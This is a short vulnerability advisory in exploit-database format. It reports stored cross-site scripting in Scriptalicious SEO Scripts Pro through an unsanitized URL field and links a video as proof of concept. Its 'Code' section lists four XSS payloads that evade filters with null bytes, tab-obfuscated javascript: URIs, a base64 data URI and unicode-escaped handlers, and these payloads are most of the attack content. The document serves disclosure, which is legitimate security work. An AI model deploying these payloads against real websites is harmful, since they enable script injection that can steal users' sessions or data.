Exploit Title: Scriptalicious Pro Cross Site Scripting
# Date: 06/01/2013
# Author: Nikhalesh Singh Bhadoria
# Twitter: @nikhaleshsingh
#Download Link: scriptalicious.com
# Versions Affected: All
# Category:Xss
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

Description:

The url input in Scriptalicious SEO Scripts Pro  is not sanitized. Therefore it results
in a stored cross-site scripting.

POC:
http://www.youtube.com/watch?v=EFVtRLJ56L8&feature=youtu.be

Code :-
########################################################################################################
"><img src=x onerror=prompt(0);>

  <iframe %00 src="&Tab;javascript:prompt(1)&Tab;"%00>

 <iframe/src="data:text/html;&Tab;base64&Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">

 <form><textarea &#13; onkeyup='\u0061\u006C\u0065\u0072\u0074&#x28;1&#x29;'>

##########################################################################################################
Fix:
Better sanitization by restricting special characters.

Regard's
Nikhalesh Singh Bhadoria
Information Security Enthusiast
Website:Gurunsb.com